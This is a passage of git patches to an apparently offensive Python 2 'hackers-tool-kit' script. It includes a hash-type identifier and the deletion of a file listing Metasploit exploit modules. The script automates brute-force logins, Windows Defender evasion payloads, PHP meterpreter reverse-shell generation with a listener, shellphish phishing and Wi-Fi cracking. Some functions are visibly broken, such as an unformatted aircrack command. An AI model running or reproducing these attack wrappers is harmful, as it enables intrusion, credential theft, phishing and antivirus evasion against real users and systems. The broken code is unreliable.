and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 0e10fe0e698d5a71e11fb5668bff78fa5b9ac614 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 01:43:40 +0100 Subject: [PATCH 136/214] Delete exploits.txt --- tools/exploits.txt | 1876 -------------------------------------------- 1 file changed, 1876 deletions(-) delete mode 100644 tools/exploits.txt diff --git a/tools/exploits.txt b/tools/exploits.txt deleted file mode 100644 index 24da764..0000000 --- a/tools/exploits.txt +++ /dev/null @@ -1,1876 +0,0 @@ -Exploits -======== - - Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- - aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation - aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow - aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) - android/adb/adb_server_exec 2016-01-01 excellent Yes Android ADB Debug Server Remote Payload Execution - android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE - android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow - android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution - android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good No Adobe Reader for Android addJavascriptInterface Exploit - android/local/futex_requeue 2014-05-03 excellent No Android 'Towelroot' Futex Requeue Kernel Exploit - android/local/put_user_vroot 2013-09-06 excellent No Android get_user/put_user Exploit - android/local/su_exec 2017-08-31 manual No Android 'su' Privilege Escalation - apple_ios/browser/safari_libtiff 2006-08-01 good No Apple iOS MobileSafari LibTIFF Buffer Overflow - apple_ios/browser/webkit_trident 2016-08-25 manual No WebKit not_number defineProperties UAF - apple_ios/email/mobilemail_libtiff 2006-08-01 good No Apple iOS MobileMail LibTIFF Buffer Overflow - apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability - bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow - bsdi/softcart/mercantec_softcart 2004-08-19 great No Mercantec SoftCart CGI Overflow - dialup/multi/login/manyargs 2001-12-12 good No System V Derived /bin/login Extraneous Arguments Buffer Overflow - firefox/local/exec_shellcode 2014-03-10 excellent No Firefox Exec Shellcode from Privileged Javascript Shell - freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) - freebsd/http/watchguard_cmd_exec 2015-06-29 excellent Yes Watchguard XCS Remote Command Execution - freebsd/local/intel_sysret_priv_esc 2012-06-12 great Yes FreeBSD Intel SYSRET Privilege Escalation - freebsd/local/mmap 2013-06-18 great Yes FreeBSD 9 Address Space Manipulation Privilege Escalation - freebsd/local/watchguard_fix_corrupt_mail 2015-06-29 manual Yes Watchguard XCS FixCorruptMail Local Privilege Escalation - freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution - freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) - freebsd/tacacs/xtacacsd_report 2008-01-08 average No XTACACSD report() Buffer Overflow - freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow - hpux/lpd/cleanup_exec 2002-08-28 excellent No HP-UX LPD Command Execution - irix/lpd/tagprinter_exec 2001-09-01 excellent Yes Irix LPD tagprinter Command Execution - linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection - linux/browser/adobe_flashplayer_aslaunch 2008-12-17 good No Adobe Flash Player ActionScript Launch Command Execution Vulnerability - linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) - linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) - linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) - linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution - linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) - linux/http/airties_login_cgi_bof 2015-03-31 normal Yes Airties login-cgi Buffer Overflow - linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual No Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution - linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution - linux/http/alienvault_sqli_exec 2014-04-24 excellent Yes AlienVault OSSIM SQL Injection and Remote Code Execution - linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution - linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution - linux/http/astium_sqli_upload 2013-09-17 manual Yes Astium Remote Code Execution - linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution - linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution - linux/http/axis_srv_parhand_rce 2018-06-18 excellent Yes Axis Network Camera .srv to parhand RCE - linux/http/belkin_login_bof 2014-05-09 normal Yes Belkin Play N750 login.cgi Buffer Overflow - linux/http/centreon_sqli_exec 2014-10-15 excellent Yes Centreon SQL and Command Injection - linux/http/centreon_useralias_exec 2016-02-26 excellent Yes Centreon Web Useralias Command Execution - linux/http/cfme_manageiq_evm_upload_exec 2013-09-04 excellent Yes Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal - linux/http/cisco_firepower_useradd 2016-10-10 excellent Yes Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability - linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution - linux/http/crypttech_cryptolog_login_exec 2017-05-03 excellent Yes Crypttech CryptoLog Remote Code Execution - linux/http/dcos_marathon 2017-03-03 excellent Yes DC/OS Marathon UI Docker Exploit - linux/http/ddwrt_cgibin_exec 2009-07-20 excellent No DD-WRT HTTP Daemon Arbitrary Command Execution - linux/http/denyall_waf_exec 2017-09-19 excellent Yes DenyAll Web Application Firewall Remote Code Execution - linux/http/dlink_authentication_cgi_bof 2013-02-08 normal Yes D-Link authentication.cgi Buffer Overflow - linux/http/dlink_command_php_exec_noauth 2013-02-04 excellent No D-Link Devices Unauthenticated Remote Command Execution - linux/http/dlink_dcs931l_upload 2015-02-23 great Yes D-Link DCS-931L File Upload - linux/http/dlink_dcs_930l_authenticated_remote_command_execution 2015-12-20 excellent No D-Link DCS-930L Authenticated Remote Command Execution - linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution - linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution - linux/http/dlink_dir605l_captcha_bof 2012-10-08 manual Yes D-Link DIR-605L Captcha Handling Buffer Overflow - linux/http/dlink_dir615_up_exec 2013-02-07 excellent No D-Link DIR615h 